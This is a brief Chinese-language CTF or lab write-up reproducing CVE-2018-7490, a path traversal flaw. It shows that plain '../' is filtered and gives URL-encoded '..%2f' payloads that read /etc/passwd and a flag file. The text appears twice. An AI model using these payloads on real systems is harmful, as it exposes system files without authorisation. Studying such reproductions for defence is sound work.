CVE-2018-7490
CVE-2018-7490复现

打开网站,使用/../../../etc/passwd,发现../被过滤了

使用/..%2f..%2f..%2f..%2fetc/passwd绕过

/..%2f..%2f..%2f..%2fflag,获得flag

CVE-2018-7490复现

打开网站,使用/../../../etc/passwd,发现../被过滤了

使用/..%2f..%2f..%2f..%2fetc/passwd绕过

/..%2f..%2f..%2f..%2fflag,获得flag
